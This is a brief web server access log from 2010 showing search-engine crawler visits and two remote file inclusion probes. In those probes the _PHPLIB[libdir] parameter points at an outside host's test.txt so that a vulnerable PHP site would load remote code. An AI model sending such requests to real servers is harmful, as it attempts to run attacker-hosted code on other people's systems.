207.46.199.43 - - [02/Mar/2010:14:15:35 -0800] "GET /images/?M=D HTTP/1.1" 200 90939 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:14:15:38 -0800] "GET /links/links19.html HTTP/1.0" 200 29321 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
211.230.148.90 - - [02/Mar/2010:14:18:49 -0800] "GET //index.php?_PHPLIB[libdir]=http://www.canadahost.ca/test.txt??? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "site.inkjetcartridge.com"
211.230.148.90 - - [02/Mar/2010:14:18:49 -0800] "GET /logs///index.php?_PHPLIB[libdir]=http://www.canadahost.ca/test.txt??? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "site.inkjetcartridge.com"
